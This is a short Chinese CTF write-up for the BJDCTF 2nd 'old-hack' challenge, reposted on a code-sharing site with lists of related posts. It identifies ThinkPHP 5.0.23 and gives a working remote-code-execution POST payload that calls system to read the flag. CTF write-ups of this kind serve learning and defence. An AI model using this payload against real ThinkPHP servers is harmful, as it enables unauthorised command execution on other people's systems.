[BJDCTF 2nd] old-hack - 代码天地

[BJDCTF 2nd] old-hack

其他 2022-01-15 08:46:21 阅读次数: 0

知识点：ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析

解题过程

打开环境
在这里插入图片描述
提示是thinkphp5的漏洞，测试一下index.php?s=1，报错

得到版本号：5.0.23，直接找payload：ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析
在这里插入图片描述

http://858341d4-67a6-4c5c-9c02-44d7380d1346.node4.buuoj.cn:81/index.php?s=1
POST传参：
_method=__construct&filter[]=system&method=get&get[]=cat /flag

在这里插入图片描述

参考链接

ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析

猜你喜欢

转载自blog.csdn.net/RABCDXB/article/details/120318426

[BJDCTF 2nd]old-hack

[BJDCTF 2nd] old-hack

[BJDCTF 2nd]old-hack && [GXYCTF2019]禁止套娃

【学习笔记14】buu [BJDCTF 2nd]old-hack

[BJDCTF 2nd]duangShell [BJDCTF 2nd]duangShell

BJDCTF 2nd WEB

[BJDCTF 2nd]elementmaster

BJDCTF 2nd writeup

[BJDCTF 2nd]duangShell

[BJDCTF 2nd]fake google

[BJDCTF 2nd]文件探测

BJDCTF 2nd pwn Writeup

[BJDCTF 2nd]one_gadget

BUUOJ [BJDCTF 2nd]elementmaster

BJDCTF 2nd writeup(二)

BJDCTF 2nd(WEB复现)

[BJDCTF 2nd]Schrödinger

BUUCTF：[BJDCTF 2nd]EasyBaBa

[BJDCTF 2nd]简单注入

CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2

[BJDCTF 2nd]r2t3

buuctf [BJDCTF 2nd]ydsneedgirlfriend2

[BJDCTF 2nd]ydsneedgirlfriend2的wp

[BJDCTF 2nd]r2t4的wp

buuoj BJDCTF 2nd one_gadget

[BUUOJ记录] [BJDCTF 2nd]fake google

[BJDCTF 2nd]duangShell（反弹shell，swp泄露）

CTF-Pwn-[BJDCTF 2nd]rci

CTF-Pwn-[BJDCTF 2nd]snake_dyn

CTF-Pwn-[BJDCTF 2nd]secret

今日推荐

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析

最强开源大模型 Llama 3 上架 Gitee AI

虽然老乡鸡开源的不是代码，但背后的原因却让人很暖心

富文本编辑器 Quill 2.0 重磅发布，特性、可靠性与开发者体验大幅提升

周排行

使用Redis中间件解决商品秒杀活动中出现的超卖问题（使用Java多线程模拟高并发环境）

野指针及c++指针使用注意点

redis 3.0　新特性

(翻译)火狐操作系统javascript API

微信小程序开发入门

mysql数据查询之五子句(where、group by、having、order by和limit)

Codeforces Round #517 Div. 1翻车记

在caffe 中实现Generative Adversarial Nets（二）

企业级漏洞扫描工具

java byte数组与String互转

每日归档

更多

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)

2024-04-17(5)

2024-04-16(70)

2024-04-15(42)

2024-04-14(0)